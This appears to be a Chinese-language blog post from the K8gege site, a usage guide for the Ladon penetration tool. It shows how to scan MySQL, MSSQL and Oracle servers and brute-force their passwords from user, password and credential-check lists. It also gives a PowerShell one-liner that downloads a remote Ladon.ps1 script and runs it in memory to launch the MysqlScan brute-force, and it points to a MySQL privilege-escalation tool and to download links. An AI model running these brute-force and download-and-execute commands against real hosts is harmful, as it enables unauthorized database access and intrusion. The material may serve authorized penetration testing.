Ladon渗透Mysql数据库一键提权 密码爆破
本文于 507 天之前发表
<% Visit %>
=============================================================================================
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
3306端口 Mysql数据库密码爆破
1 | Ladon 192.168.1.8/24 MysqlScan |
配置密码爆破参数
1 支持标准的user.txt和pass.txt帐密破解,爆破每个用户都需将密码跑完或跑出正确为此
2 支持userpass.txt(存放用户名和对应密码),用于快速验证其它机器是否存在相同帐密
3 支持check.txt(存放IP/端口/库名/用户/密码),不指定端口和数据库名则使用默认
user.txt和pass.txt分别存放用户、密码
userpass.txt存放用户密码组,即每行存放用户以及密码
check.txt每行存放IP\端口\用户\密码
数据库口令检测
mssql密码验证
(大型内网可能从其它机器收集到大量机器密码,第一步肯定是先验证)
非默认端口请将以下端口改成被修改端口即可,单个IP可直接Ladon IP:端口 MssqlScan扫描
check.txt
192.168.1.8 1433 master sa k8gege
192.168.1.8 sa k8gege
192.168.1.8 1433 sa k8gege
命令: Ladon MssqlScan
Oracle同理
192.168.1.8 1521 orcl system k8gege
192.168.1.8 orcl system k8gege
192.168.1.8 system k8gege
命令: Ladon OrcleScan
Mysql无需指定数据库名
192.168.1.8 3306 root k8gege
192.168.1.8 root k8gege
命令: Ladon MssqlScan
PowerLadon
远程加载MysqlScan 1521端口弱口令爆破
powershell “IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.1.3:800/Ladon.ps1’); Ladon 192.168.1.141 MysqlScan”
Kali、Linux、Mac、路由器等操作系统
./Ladon 192.168.1.8/24 MysqlScan
Mysql数据库远程提权工具
1 |
工具下载
最新版本:http://k8gege.org/Download
历史版本: https://github.com/k8gege/Ladon/releases

转载声明
K8博客文章随意转载,转载请注明出处! © K8gege http://k8gege.org

扫码加入K8小密圈